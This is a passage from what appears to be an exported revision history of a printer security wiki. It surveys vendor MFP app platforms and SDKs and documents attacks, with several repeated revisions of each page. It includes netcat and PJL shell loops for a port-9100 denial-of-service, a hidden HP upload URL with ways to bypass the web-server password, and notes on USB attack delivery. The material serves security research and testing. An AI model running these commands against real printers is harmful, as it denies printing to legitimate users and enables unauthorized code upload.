be installed on many MFPs and automatically uploads scanned or copied documents to predefined locations. Obviously, the feature to run custom code on a printer device is a potential security thread. Furthermore code signing of software packages is potentially harder than it is for firmware as software is not only written by the printer manufacturer but by a broader range of developers who need to be in possession of the secret key to sign their software. Therefore it is logical to include the secret key in SDKs which are protected by being exclusively available from developer platforms. This article is an effort to systematically gather information on vendor-specific software platforms/SDKs. == Vendors == In the following a rough outline on the software platforms provided by major printer vendors to extend functionality of their devices is given. === HP (Chai/OXP) === HP introduced their ‘Chai Appliance Platform’ platform in 1999 to run Java applications on LaserJet printers. While an SDK had been open to the public at first <ref>''[https://www.heise.de/newsticker/meldung/Java-API-fuer-HP-Drucker-54026.html Java API für HP-Drucker]'', heise online, 2001</ref>, access was later restricted to members of HP's developer network. Chai servlets which come as <code>.jar</code> files which originally needed to be certified and signed by HP before they would be accepted by a printer device. <ref name="phenoelit2002embedded">''Attacking Networked Embedded Devices'', Black Hat USA, FX and FtR of Phenoelit, 2002</ref> discovered a flaw in the deployment process: By installing ''EZloader'' – an alternative loader software provided by HP which had already been signed – they were able to upload and run their own, unsigned Java packages. As it seems, code signing was completely dropped by HP for later Chai versions: <ref name="mueller2016printers">''Exploiting Network Printers'', J. Müller, 2016, p. 59</ref> were able to write and execute a proof-of-concept printer malware which listens on port 9100 and uploads incoming documents to an FTP server before printing them. Their code is based on <ref>''Distribuição Balanceada de Jobs em uma Rede de Impressoras'', L. Waechter, 2005</ref> who extended the device to support load-balancing and included the required SDK files and proprietary Java libraries in their demonstration. With the libraries, arbitrary Java code can be complied and executed on older HP LaserJets by uploading the <code>.jar</code> files to a ‘hidden’ URL: <code>http://printer/hp/device/this.loader</code>. This attack can be carried out if no password has yet been set for the embedded web server. Otherwise, the password must first be retrieved from <code>/dev/rdsk_jdi_cfg0</code> with PostScript (see [[file system access]]) or bypassed by resetting the device to [[factory defaults]]. A web attacker can upload the <code>.jar</code> file using [https://en.wikipedia.org/wiki/Cross-site_request_forgery CSRF] if the victim is currently logged into the printer's embedded web server. For newer devices, HP uses the web services based ‘Open Extensibility Platform’ ([https://developers.hp.com/oxp/ OXP]) instead of Chai of which no SDK is publicly available. === Canon (MEAP) === The ‘Multifunctional Embedded Application Platform’ ([http://www.developersupport.canon.com/faq/335#t335n18 MEAP]) is a Java-based software platform introduced by Canon in 2003 for their imageRunner series and extended to web services in 2010. Third party developers can obtain the MEAP [http://developersupport.canon.com/content/meap-sdk-0 SDK] for a fee of ''$5,000'' which is certainly out of scope for research purposes. === Xerox/Dell (EIP) === The ‘Extensible Interface Platform’ ([http://www.office.xerox.com/eip/enus.html EIP]) <ref>''[http://www.it-executive.nl/images/downloads/Extensible%20Interface.pdf From Peripheral To Platform: MFP Software Development Tools and Xerox's Extensible Interface Platform]'', B. Bissett, 2016</ref> was announced in 2006 by Xerox for various MFPs. The architecture – which is also supported by a few rebadged Dell devices – is based on web services technology. The [http://www.office.xerox.com/eip/enus.html SDK] is freely available for registered developers. === Brother (BSI) === The ‘Brother Solutions Interface’ ([https://www.brother-usa.com/lp/civ/bsi.aspx BSI]) is an XML-based web architecture launched in 2012 for scanners, copiers and printers. Access to the [https://www.brother-usa.com/lp/civ/home.aspx SDK] is available to licensed developers. === Lexmark (eSF) === The ‘Embedded Solution Framework’ ([http://www.lexmark-emea.com/usa/BSD_solution_catalouge.pdf eSF]) was launched in 2006 for Lexmark MFPs. The SDK to develop Java applications is reserved for ‘specially qualified partners’. According to <ref>''[http://media.lexmark.com/www/doc/en_US/Security_White_Paper_Final_Q12014.pdf Security Features of Lexmark Multi-Function and Single Function Printers]'', Lexmark International, 2013, p. 6</ref> ‘these applications must be digitally signed by Lexmark before being adopted’ using 2048-bit RSA signatures. === Samsung (XOA) === The ‘eXtensible Open Architecture’ ([http://samsungprintingsolutions.com/2015/02/can-samsungs-extensible-open-architecture-xoa/ XOA]) was introduced by Samsung in 2008 and comes in two flavours: the XOA-E Java virtual machine and the web services based XOA-Web. The [http://xoapartnerportal.com/ SDK] is only available to Samsung resellers. === Ricoh (ESA) === The ‘Embedded Software Architecture’ ([https://www.ricoh.com/esa/ ESA]) <ref>''[http://ricoh.com/esa/pdf/white_letter.pdf White Paper: Embedded Software Architecture SDK]'', Ricoh Company, Ltd., 2014</ref> was launched by Ricoh in 2004. The Java based [http://www.ricoh-developer.com/content/device-sdk-type-j-sdkj-overview SDK/J] is available to developers after a registration. === Kyocera/Utax (HyPAS) === The ‘Hybrid Platform for Advanced Solutions’ ([http://usa.kyoceradocumentsolutions.com/americas/jsp/Kyocera/hypas_overview.jsp HyPAS]) <ref>''[http://www.officeproductnews.net/sites/default/files/imce/KyoceraWhitepaper_0.pdf Kyocera's HyPAS Technology – A Whitepaper]'', Kyocera Corp., 2013</ref> has been released by Kyocera in 2008. Applications are based either on Java or on web services. The [https://www.kyoceradocumentsolutions.eu/index/document_solutions/HyPAS/hypas_developer_partner.html SDK] is only available for members of the ‘HyPAS Development Partner Programme’ and applications have to be approved by Kyocera. === Konica Minolta (bEST) === The ‘bizhub Extended Solution Technology’ ([https://best.kmbs.us/ bEST]) <ref>''[http://www.biz.konicaminolta.com/technologies/best/pdf/bEST_Whitepaper.pdf Konica Minolta's bizhub Extended Solution Technology (bEST) Software Development Platform for MFPs]'', B. Bissett, 2009</ref> which is based on web services was introduced by Konica Minolta in 2009. Access to the [https://best.kmbs.us/pages/levels.php SDK] requires ‘platinum membership level’ in the developer program for a fee of ''$4,000'' which is out of scope for independent researchers. === Toshiba (e-BRIDGE) === The ‘e-BRIDGE Open Platform’ ([http://www.estudio.com.sg/solutions_ebridge.aspx e-BRIDGE]) was released by Toshiba in 2008 to customize their high-end MFPs based on web services technology. An SDK is not available to the general public. === Sharp (OSA) === The ‘Open Systems Architecture’ ([http://siica.sharpusa.com/Document-Systems/Sharp-OSA OSA]) <ref>''[http://www.kelo-kopiertechnik.de/uploads/prospekte/loesungen/Prospekt OSA.pdf Sharp OSA – Informationen für Sharp Fachhändler]'', Sharp K.K., 2009</ref> was announced by Sharp in 2004. The [http://sharp-partners.com/us/PartnerPrograms/DeveloperProgram/tabid/722/Default.aspx SDK] used to develop web services is fee-based and applications need to be validated by Sharp before they can be installed on an MFP. === Oki (sXP) === The ‘smart eXtendable Platform’ ([http://www.oki.com/en/press/2014/09/z14053e.html sXP]) <ref>''[http://www.oki.com/en/otr/2016/n227/pdf/otr-227-R05.pdf Office Solution with Multifunction Printer]'', N. Toshiyuki and T. Ito, Oki Electric Industry Co., Ltd., 2016</ref> which is based on web services was launched by Oki Data in 2013 for their MFP devices. Oki does not publish any information regarding an official developer program or publicly available SDK. == Results == On older HP laser printers, arbitrary Java bytecode can be executed as demonstrated by <ref name="phenoelit2002embedded"/> and <ref name="mueller2016printers"/>. Security is based on the password of the embedded web server which can be easily readout with PostScript or bypassed by restoring factory defaults. It is hard to make a reasoned statement on the security of other software platforms because of lacking access to the SDK and/or proper technical documentation. A comparison of platforms, applied technologies and – where known – software package deployment procedures is given below: {| class="wikitable" style="text-align:center" |- ! Vendor !! Platform !! Embedded Java !! Web services !! Deployment |- | HP || Chai/OXP || ✔ || ✔ || web server |- | Xerox/Dell || EIP || || ✔ || ? |- | Canon || MEAP || ✔ || ✔ || ? |- | Brother || BSI || || ✔ || ? |- | Lexmark || eSF || ✔ || || ? |- | Samsung || XOA || ✔ || ✔ || web server |- | Ricoh || ESA || ✔ || || ? |- | Kyocera/Utax || HyPAS || ✔ || ✔ || USB drive |- | Konica Minolta || bEST || || ✔ || ? |- | Toshiba || e-Bridge || || ✔ || ? |- | Sharp || OSA || || ✔ || ? |- | Oki || sXP || || ✔ || ? |- |} '''How to test for this attack?''' Obtain an SDK and write your own application or find a ‘printer app’ which already does what you want (for example, automatically upload scanned documents to FTP). '''Who can perform this attack?''' Dependend on how software packages are deployed. ---- e1516c1434485fa97c4c57eb321f5630b02e9c37 191 190 2017-01-22T19:32:21Z Admin 1 wikitext text/x-wiki support to install additional software Furthermore we surveyed which platforms are provided by the major vendors to develop custom software for printers and built a proof-of-concept malware where access to an \acs{SDK} was available. 15f9065fe18a9e54e57e7b83f771f0d96c695ad1 190 2017-01-22T19:19:33Z Admin 1 Created page with "support to install additional software" wikitext text/x-wiki support to install additional software 9d621b18b2fc2ea22f2d04ab32e1d91ac13c3177 0 35 175 174 2017-01-21T11:44:08Z Admin 1 wikitext text/x-wiki If print jobs are processed in series – which is assumed for most devices – only one job can be handled at a time. If this job does not terminate the printing channel effectively is blocked until a timeout is triggered, preventing legitimate users from printing. This trivial denial of service attack can be improved by setting a high timeout value with [[PJL]]. '''How to test for this attack?''' Connecting to port 9100/tcp of a printer without closing the connection prevents most devices to accept new print jobs. Tests can be performed using the ''netcat'' <ref>''[http://nc110.sourceforge.net/ Netcat – TCP/IP Swiss Army Knife]'', Hobbit, 1996</ref> utility in a loop as shown below: <syntaxhighlight lang=sh> while true; do nc printer 9100; done </syntaxhighlight> A more advanced version of this DoS attack which sets a higher timeout is given below. <syntaxhighlight lang=sh> # get maximum timeout value with PJL MAX="`echo "@PJL INFO VARIABLES" | nc -w3 printer 9100 |\ grep -E -A2 '^TIMEOUT=' | tail -n1 | awk '{print $1}'`" # connect and set maximum timeout for current job with PJL while true; do echo "@PJL SET TIMEOUT=$MAX" | nc printer 9100; done </syntaxhighlight> While the PJL reference specifies a maximum timeout of 300 seconds <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 6-25</ref>, in practice maximum PJL timeouts may range from 15 to 2147483 seconds. Hence, this value is first retrieved be from the printer and then set in all further connections. The advantage of this approach is that the number of connections for an attacker to make is minimized while it is even harder for legitimate users to gain a free time slot (race condition) to deploy a print job. Note that even print jobs received from other printing channels like IPP or LPD are not processed anymore as long as the connection is kept open. To check the PJL timeout settings for you printer, [[PRET]] can be used as follows: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> env timeout TIMEOUT=15 [2 RANGE] 5 300 '''Who can perform this attack?''' Anyone who can access port 9100/tcp of a printer device. Note that this can even be accomplished with [[cross-site printing]] techniques as long as the website used to enforce XHR connections is kept open. ---- ee3ca89682d80db72c93322d5c60ea226d241a9d 174 173 2017-01-21T11:43:33Z Admin 1 wikitext text/x-wiki If print jobs are processed in series – which is assumed for most devices – only one job can be handled at a time. If this job does not terminate the printing channel effectively is blocked until a timeout is triggered, preventing legitimate users from printing. This trivial denial of service attack can be improved by setting a high timeout value with [[PJL]]. '''How to test for this attack?''' Connecting to port 9100/tcp of a printer without closing the connection prevents most devices to accept new print jobs. Tests can be performed using the ''netcat'' <ref>''[http://nc110.sourceforge.net/ Netcat – TCP/IP Swiss Army Knife]'', Hobbit, 1996</ref> utility in a loop as shown below: <syntaxhighlight lang=sh> while true; do nc printer 9100; done </syntaxhighlight> A more advanced version of this DoS attack which sets a higher timeout is given below. # get maximum timeout value with PJL MAX="`echo "@PJL INFO VARIABLES" | nc -w3 printer 9100 |\ grep -E -A2 '^TIMEOUT=' | tail -n1 | awk '{print $1}'`" # connect and set maximum timeout for current job with PJL while true; do echo "@PJL SET TIMEOUT=$MAX" | nc printer 9100; done While the PJL reference specifies a maximum timeout of 300 seconds <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 6-25</ref>, in practice maximum PJL timeouts may range from 15 to 2147483 seconds. Hence, this value is first retrieved be from the printer and then set in all further connections. The advantage of this approach is that the number of connections for an attacker to make is minimized while it is even harder for legitimate users to gain a free time slot (race condition) to deploy a print job. Note that even print jobs received from other printing channels like IPP or LPD are not processed anymore as long as the connection is kept open. To check the PJL timeout settings for you printer, [[PRET]] can be used as follows: <syntaxhighlight lang=sh> ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> env timeout TIMEOUT=15 [2 RANGE] 5 300 </syntaxhighlight> '''Who can perform this attack?''' Anyone who can access port 9100/tcp of a printer device. Note that this can even be accomplished with [[cross-site printing]] techniques as long as the website used to enforce XHR connections is kept open. ---- c18897ab45deb9cc76a6c27a32059b961f492c61 173 143 2017-01-21T11:40:54Z Admin 1 wikitext text/x-wiki If print jobs are processed in series – which is assumed for most devices – only one job can be handled at a time. If this job does not terminate the printing channel effectively is blocked until a timeout is triggered, preventing legitimate users from printing. This trivial denial of service attack can be improved by setting a high timeout value with [[PJL]]. '''How to test for this attack?''' Connecting to port 9100/tcp of a printer without closing the connection prevents most devices to accept new print jobs. Tests can be performed using the ''netcat'' <ref>''[http://nc110.sourceforge.net/ Netcat – TCP/IP Swiss Army Knife]'', Hobbit, 1996</ref> utility in a loop as shown below: <syntaxhighlight lang=sh> while true; do nc printer 9100; done </syntaxhighlight> A more advanced version of this DoS attack which sets a higher timeout is given below. <syntaxhighlight lang=sh> # get maximum timeout value with PJL MAX="`echo "@PJL INFO VARIABLES" | nc -w3 printer 9100 |\ grep -E -A2 '^TIMEOUT=' | tail -n1 | awk '{print $1}'`" # connect and set maximum timeout for current job with PJL while true; do echo "@PJL SET TIMEOUT=$MAX" | nc printer 9100; done </syntaxhighlight> While the PJL reference specifies a maximum timeout of 300 seconds <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 6-25</ref>, in practice maximum PJL timeouts may range from 15 to 2147483 seconds. Hence, this value is first retrieved be from the printer and then set in all further connections. The advantage of this approach is that the number of connections for an attacker to make is minimized while it is even harder for legitimate users to gain a free time slot (race condition) to deploy a print job. Note that even print jobs received from other printing channels like IPP or LPD are not processed anymore as long as the connection is kept open. To check the PJL timeout settings for you printer, [[PRET]] can be used as follows: <syntaxhighlight lang=sh> ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> env timeout TIMEOUT=15 [2 RANGE] 5 300 </syntaxhighlight> '''Who can perform this attack?''' Anyone who can access port 9100/tcp of a printer device. Note that this can even be accomplished with [[cross-site printing]] techniques as long as the website used to enforce XHR connections is kept open. ---- 4a980a78a8378d7b7a1729c6805a1cbcda46b9cd 143 2017-01-15T15:55:10Z 92.227.58.56 0 Created page with "If print jobs are processed in series – which is assumed for most devices – only one job can be handled at a time. If this job does not terminate the printing channel effe..." wikitext text/x-wiki If print jobs are processed in series – which is assumed for most devices – only one job can be handled at a time. If this job does not terminate the printing channel effectively is blocked until a timeout is triggered, preventing legitimate users from printing. This trivial denial of service attack can be improved by setting a high timeout value with [[PJL]]. '''How to test for this attack?''' Connecting to port 9100/tcp of a printer without closing the connection prevents most devices to accept new print jobs. Tests can be performed using the ''netcat'' <ref>''[http://nc110.sourceforge.net/ Netcat – TCP/IP Swiss Army Knife]'', Hobbit, 1996</ref> utility in a loop as shown below: <syntaxhighlight lang=sh> while true; do nc printer 9100; done </syntaxhighlight> A more advanced version of this DoS attack which sets a higher timeout is given below. <syntaxhighlight lang=sh> # get maximum timeout value with PJL MAX="`echo "@PJL INFO VARIABLES" | nc -w3 printer 9100 |\ grep -E -A2 '^TIMEOUT=' | tail -n1 | awk '{print $1}'`" # connect and set maximum timeout for current job with PJL while true; do echo "@PJL SET TIMEOUT=$MAX" | nc printer 9100; done </syntaxhighlight> While the PJL reference specifies a maximum timeout of 300 seconds <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 6-25</ref>, in practice maximum PJL timeouts may range from 15 to 2147483 seconds. Hence, this value is first retrieved be from the printer and then set in all further connections. The advantage of this approach is that the number of connections for an attacker to make is minimized while it is even harder for legitimate users to gain a free time slot (race condition) to deploy a print job. Note that even print jobs received from other printing channels like IPP or LPD are not processed anymore as long as the connection is kept open. To check the PJL timeout settings for you printer, [[PRET]] can be used as follows: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> env timeout TIMEOUT=15 [2 RANGE] 5 300 '''Who can perform this attack?''' Anyone who can access port 9100/tcp of a printer device. Note that this can even be accomplished with [[cross-site printing]] techniques as long as the website used to enforce XHR connections is kept open. ---- ee3ca89682d80db72c93322d5c60ea226d241a9d 0 64 271 270 2017-01-28T16:43:32Z Admin 1 wikitext text/x-wiki The Universal Exit Language (UEL) actually is not a real [[Fundamentals#Printer_Control_Languages|job control]] ‘language’ but a single command used to terminate the current data stream: the escape character (<code>\x1b</code>), followed by <code>%-12345X</code>. It was originally introduced with HP's [[PCL]] and is supported by most modern laser printers. A good practice of ‘printer drivers’ is to invoke the UEL at the beginning and at the end of each print job, so interpretation of the printer language is stopped/restarted and each job has its own, separate environment as shown below: \x1b%-12345X @PJL SET PAPER=A4 @PJL ENTER LANGUAGE=PCL ... [PCL datastream] ... \x1b%-12345X Otherwise, for example PJL settings like paper media size or PostScript definitions set in one print job would influence the next job. The UEL can be handy to string together multiple jobs into a single file/datastream sent to the printer. This can be used to fool [[Accounting_bypass#Page_counter_manipulation|hardware page counters]] or to switch the printing language in advances [[Cross-site printing#Limitations_of_cross-site_printing|cross-site printing]] attacks, for example. 5e06d4df239c96287e8771443e5e017a90a262c8 270 2017-01-28T16:33:41Z Admin 1 Created page with "The Universal Exit Language (UEL) actually is not a real [[Fundamentals#Printer_Control_Languages|job control]] ‘language’ but a single command used to terminate the curre..." wikitext text/x-wiki The Universal Exit Language (UEL) actually is not a real [[Fundamentals#Printer_Control_Languages|job control]] ‘language’ but a single command used to terminate the current data stream: the escape character (<code>\x1b</code>), followed by <code>%-12345X</code>. It was originally introduced with HP's [[PCL]] and is supported by most modern laser printers. It is a good practice of ‘printer drivers’ to invoke the UEL at the beginning and at the end of each print job, so interpretation of the printer language is stopped/restarted and each job has its own environment. Otherwise, for example PJL settings like paper media size or PostScript definitions set in one print job would influence the next job. The UEL can be handy to string together multiple jobs into a single file/datastream sent to the printer and can be used to fool [[Accounting_bypass#Page_counter_manipulation|hardware page counters]], for example. 786c3c019c07adcd4ec8b98294805152bccd44e7 0 65 286 2017-01-28T17:43:04Z Admin 1 Redirected page to [[USB drive or cable]] wikitext text/x-wiki #REDIRECT [[USB drive or cable]] 2c1fe1a6baf3390b83b52c880283533dd991c8b1 0 31 316 302 2017-01-31T08:35:52Z 84.153.135.37 0 wikitext text/x-wiki [[File:USB-deployment-channel.png|thumb|160px|Printing over USB]] Data can be sent to and received from a local printer by [https://en.wikipedia.org/wiki/USB USB] or [https://en.wikipedia.org/wiki/IEEE_1284 parallel] cables. Both channels are supported by [[PRET]] to communicate with the device. In addition, printers and MFPs often ship with ''Type-A'' USB ports which allows users to print directly from an USB device. While plugged-in USB drives do not offer a bidirectional channel, their usage in a crowded copy room may seem less conspicuous. Obviously, exploiting USB printers requires the attacker to gain physical access to the device. However, it is not completely unrealistic for most institutions and companies. Gaining physical access to printer can generally be considered as less hard than it is for other network components like servers or workstations. This is because printers are usually shared by and accessible to a whole department. Sneaking into an unlocked copy room and launching a malicious print job from USB stick is only a matter of seconds. Further real-world scenarios include copy shops or publicly available printers at schools and universities. <!-- and for PostScript based [[information disclosure]] attacks, the result can simply be leaked by printing it on paper --> <!-- smart card based access control --> '' '''Is your copy room always locked?''' '' → ''Related articles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]] fe2454b59e920f3e51ad399abcedc376450765e8 302 280 2017-01-31T08:01:34Z 84.153.135.37 0 wikitext text/x-wiki [[File:USB-deployment-channel.png|thumb|160px|Printing over USB]] Data can be send to and received from a local printer by [https://en.wikipedia.org/wiki/USB USB] or [https://en.wikipedia.org/wiki/IEEE_1284 parallel] cables. Both channels are supported by [[PRET]] to communicate with the device. In addition, printers and MFPs often ship with ''Type-A'' USB ports which allows users to print directly form a USB drive. While plugged-in USB drives do not offer a bidirectional channel, their usage in a crowded copy room may seem less conspicuous. Obviously, exploiting USB printers requires the attacker to gain physical access to the device. However, it is not completely unrealistic for most institutions and companies. Gaining physical access to printer can generally be considered as less hard than it is for other network components like servers or workstations. This is because printers are usually shared by and accessible to a whole department. Sneaking into an unlocked copy room and launching a malicious print job from USB stick is only a matter of seconds. Further real-world scenarios include copy shops or publicly available printers at schools and universities. <!-- and for PostScript based [[information disclosure]] attacks, the result can simply be leaked by printing it on paper --> <!-- smart card based access control --> '' '''Is your copy room always locked?''' '' → ''Related articles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]] a337d93b00a7d87d7a9b2c11c7853d7a10628e73 280 278 2017-01-28T16:50:40Z Admin 1 wikitext text/x-wiki [[File:USB-deployment-channel.png|thumb|160px|Printing over USB]] Data can be send to and received from a local printer by [https://en.wikipedia.org/wiki/USB USB] or [https://en.wikipedia.org/wiki/IEEE_1284 parallel] cables. Both channels are supported by [[PRET]] to communicate with the device. In addition, printers and MFPs often ship with ''Type-A'' USB ports which allows users to print directly form a USB drive. While plugged-in USB drives do not offer a bidirectional channel, their usage in a crowded copy room may seem less conspicuous. Obviously, exploiting USB printers requires the attacker to gain physical access to the device. However, it is not completely unrealistic for most institutions and companies. Gaining physical access to printer can generally be considered as less hard than it is for other network components like servers or workstations. This is because printers are usually shared by and accessible to a whole department. Sneaking into an unlocked copy room and launching a malicious print job from USB stick is only a matter of seconds. Further real-world scenarios include copy shops or publicly available printers at schools and universities. <!-- and for PostScript based [[information disclosure]] attacks, the result can simply be leaked by printing it on paper --> <!-- smart card based access control --> '' '''Is your copy room always locked?''' '' → ''Related aricles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]] 90d8e4179a9bbe17da2ebb47435fea6a9a221918 278 277 2017-01-28T16:47:08Z Admin 1 wikitext text/x-wiki [[File:USB-deployment-channel.png|thumb|160px|Printing over USB]] Data can be send to and received from a local printer by [https://en.wikipedia.org/wiki/USB USB] or [https://en.wikipedia.org/wiki/IEEE_1284 parallel] cables. Both channels are supported by [[PRET]] to communicate with the device. In addition, printers and MFPs often ship with ''Type-A'' USB ports which allows users to print directly form a USB drive. While plugged-in USB drives do not offer a bidirectional channel, their usage in a crowded copy room may seem less conspicuous. Obviously, exploiting USB printers requires the attacker to gain physical access to the device. However, it is not completely unrealistic for most institutions and companies. Gaining physical access to printer can generally be considered as less hard than it is for other network components like servers or workstations. This is because printers are usually shared by and accessible to a whole department. Sneaking into an unlocked copy room and launching a malicious print job from USB stick is only a matter of seconds. Further real-world scenarios include copy shops or publicly available printers at schools and universities. <!-- and for PostScript based [[information disclosure]] attacks, the result can simply be leaked by printing it on paper --> <!-- smart card based access control --> '''Is your copy room always locked?''' → ''Related aricles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]] ca09042c447c9e7195e4aede3a0f58bbc60a447c 277 261 2017-01-28T16:47:01Z Admin 1 wikitext text/x-wiki [[File:USB-deployment-channel.png|thumb|160px|Printing over USB]] Data can be send to and received from a local printer by [https://en.wikipedia.org/wiki/USB USB] or [https://en.wikipedia.org/wiki/IEEE_1284 parallel] cables. Both channels are supported by [[PRET]] to communicate with the device. In addition, printers and MFPs often ship with ''Type-A'' USB ports which allows users to print directly form a USB drive. While plugged-in USB drives do not offer a bidirectional channel, their usage in a crowded copy room may seem less conspicuous. Obviously, exploiting USB printers requires the attacker to gain physical access to the device. However, it is not completely unrealistic for most institutions and companies. Gaining physical access to printer can generally be considered as less hard than it is for other network components like servers or workstations. This is because printers are usually shared by and accessible to a whole department. Sneaking into an unlocked copy room and launching a malicious print job from USB stick is only a matter of seconds. Further real-world scenarios include copy shops or publicly available printers at schools and universities. <!-- and for PostScript based [[information disclosure]] attacks, the result can simply be leaked by printing it on paper --> <!-- smart card based access control --> '''Is your copy room always locked?''' → ''Related aricles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[Port 9100 printing]] e2fc73c748c9f3892b58c5887957f64f51ea8ed5 261 255 2017-01-28T14:46:14Z Admin 1 wikitext text/x-wiki [[File:USB-deployment-channel.png|thumb|160px|Printing over USB]] Data can be send to and received from a local printer by [https://en.wikipedia.org/wiki/USB USB] or [https://en.wikipedia.org/wiki/IEEE_1284 parallel] cables. Both channels are supported by [[PRET]] to communicate with the device. In addition, printers and MFPs often ship with ''Type-A'' USB ports which allows users to print directly form a USB drive. While plugged-in USB drives do not offer a bidirectional channel, their usage in a crowded copy room may seem less conspicuous. Obviously, exploiting USB printers requires the attacker to gain physical access to the device. However, it is not completely unrealistic for most institutions and companies. Gaining physical access to printer can generally be considered as less hard than it is for other network components like servers or workstations. This is because printers are usually shared by and accessible to a whole department. Sneaking into an unlocked copy room and launching a malicious print job from USB stick is only a matter of seconds. Further real-world scenarios include copy shops or publicly available printers at schools and universities. <!-- and for PostScript based [[information disclosure]] attacks, the result can simply be leaked by printing it on paper --> <!-- smart card based access control --> '''Is your copy room always locked?''' 0a8660100431c2d4aad9e1543da3c2d5ad414917 255 249 2017-01-28T14:40:54Z Admin 1 wikitext text/x-wiki [[File:USB-deployment-channel.png|thumb|190px|USB print job deployment]] Data can be send to and received from a local printer by [https://en.wikipedia.org/wiki/USB USB] or [https://en.wikipedia.org/wiki/IEEE_1284 parallel] cables. Both channels are supported by [[PRET]] to communicate with the device. In addition, printers and MFPs often ship with ''Type-A'' USB ports which allows users to print directly form a USB drive. While plugged-in USB drives do not offer a bidirectional channel, their usage in a crowded copy room may seem less conspicuous. Obviously, exploiting USB printers requires the attacker to gain physical access to the device. However, it is not completely unrealistic for most institutions and companies. Gaining physical access to printer can generally be considered as less hard than it is for other network components like servers or workstations. This is because printers are usually shared by and accessible to a whole department. Sneaking into an unlocked copy room and launching a malicious print job from USB stick is only a matter of seconds. Further real-world scenarios include copy shops or publicly available printers at schools and universities. <!-- and for PostScript based [[information disclosure]] attacks, the result can simply be leaked by printing it on paper --> <!-- smart card based access control --> '''Is your copy room always locked?''' 30629bd8a604cddeffba07b962132cb06597b2e3 249 248 2017-01-28T14:17:40Z Admin 1 wikitext text/x-wiki [[File:USB-deployment-channel.png|thumb|Deployment of (malicious) print jobs via USB]] Data can be send to and received from a local printer by [https://en.wikipedia.org/wiki/USB USB] or [https://en.wikipedia.org/wiki/IEEE_1284 parallel] cables. Both channels are supported by [[PRET]] to communicate with the device. In addition, printers and MFPs often ship with ''Type-A'' USB ports which allows users to print directly form a USB drive. While plugged-in USB drives do not offer a bidirectional channel, their usage in a crowded copy room may seem less conspicuous. Obviously, exploiting USB printers requires the attacker to gain physical access to the device. However, it is not completely unrealistic for most institutions and companies. Gaining physical access to printer can generally be considered as less hard than it is for other network components like servers or workstations. This is because printers are usually shared by and accessible to a whole department. Sneaking into an unlocked copy room and launching a malicious print job from USB stick is only a matter of seconds. Further real-world scenarios include copy shops or publicly available printers at schools and universities. <!-- and for PostScript based [[information disclosure]] attacks, the result can simply be leaked by printing it on paper --> <!-- smart card based access control --> '''Is your copy room always locked?''' f10e65613f3c3f0fb17a973038fe72ec0ffe3896 248 247 2017-01-28T14:17:24Z Admin 1 wikitext text/x-wiki [[File:USB-deployment-channel.png|thumb|Deployment of (malicious) print jobs via USB]] Data can be send to and received from a local printer by [https://en.wikipedia.org/wiki/USB USB] or [https://en.wikipedia.org/wiki/IEEE_1284 parallel] cables. Both channels are supported by [[PRET]] to communicate with the device. In addition, printers and MFPs often ship with ''Type-A'' USB ports which allows users to print directly form a USB drive. While plugged-in USB drives do not offer a bidirectional channel, their usage in a crowded copy room may seem less conspicuous. Obviously, exploiting USB printers requires the attacker to gain physical access to the device. However, it is not completely unrealistic for most institutions and companies. Gaining physical access to printer can generally be considered as less hard than it is for other network components like servers or workstations. This is because printers are usually shared by and accessible to a whole department. Sneaking into an unlocked copy room and launching a malicious print job from USB stick is only a matter of seconds. Further real-world scenarios include copy shops or publicly available printers at schools and universities. <!-- and for PostScript based [[information disclosure]] attacks, the result can simply be leaked by printing it on paper --> <!-- smart card based access control --> === Is your copy room always locked? === 30769d8004829c0623ec7975139724eb66f77f58 247 92 2017-01-28T14:16:25Z Admin 1 wikitext text/x-wiki [[File:USB-deployment-channel.png|thumb|Deployment of (malicious) print jobs via USB]] Data can be send to and received from a local printer by [https://en.wikipedia.org/wiki/USB USB] or [https://en.wikipedia.org/wiki/IEEE_1284 parallel] cables. Both channels are supported by [[PRET]] to communicate with the device. In addition, printers and MFPs often ship with ''Type-A'' USB ports which allows users to print directly form a USB drive. While plugged-in USB drives do not offer a bidirectional channel, their usage in a crowded copy room may seem less conspicuous. Obviously, exploiting USB printers requires the attacker to gain physical access to the device. However, it is not completely unrealistic for most institutions and companies. Gaining physical access to printer can generally be considered as less hard than it is for other network components like servers or workstations. This is because printers are usually shared by and accessible to a whole department. Sneaking into an unlocked copy room and launching a malicious print job from USB stick is only a matter of seconds. Further real-world scenarios include copy shops or publicly available printers at schools and universities. <!-- and for PostScript based [[information disclosure]] attacks, the result can simply be leaked by printing it on paper --> <!-- smart card based access control --> eae7dd1686d35159f7d3f06b46a5c7029d62fb73 92 91 2017-01-10T17:04:26Z 134.147.128.156 0 wikitext text/x-wiki Data can be send to and received from a local printer by [https://en.wikipedia.org/wiki/USB USB] or [https://en.wikipedia.org/wiki/IEEE_1284 parallel] cables. Both channels are supported by [[PRET]] to communicate with the device. In addition, printers and MFPs often ship with ''Type-A'' USB ports which allows users to print directly form a USB drive. While plugged-in USB drives do not offer a bidirectional channel, their usage in a crowded copy room may seem less conspicuous. Obviously, exploiting USB printers requires the attacker to gain physical access to the device. However, it is not completely unrealistic for most institutions and companies. Gaining physical access to printer can generally be considered as less hard than it is for other network components like servers or workstations. This is because printers are usually shared by and accessible to a whole department. Sneaking into an unlocked copy room and launching a malicious print job from USB stick is only a matter of seconds. Further real-world scenarios include copy shops or publicly available printers at schools and universities. <!-- and for PostScript based [[information 